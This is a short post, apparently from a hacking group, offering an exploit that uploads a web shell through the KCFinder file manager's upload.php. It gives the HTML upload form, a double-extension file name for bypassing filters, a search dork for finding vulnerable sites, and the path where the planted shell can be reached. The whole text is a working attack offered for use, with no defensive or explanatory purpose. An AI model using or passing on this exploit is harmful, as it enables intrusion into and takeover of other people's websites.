Hi Guys today i want post a new exploit descovered today by INCEF-Team
is An exploit for upload shell in kcfinder
code of exploit :
<form method="POST" action="site/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>~/ ndsxf</button>
</form>
if site infected will show u : "Unknown error"
shell format is : shell.php.ndsxf
Dork : inurl:/kcfinder/upload.php
and shell dir is : site/path/upload/files/shell.php.ndsxf
EmoticonEmoticon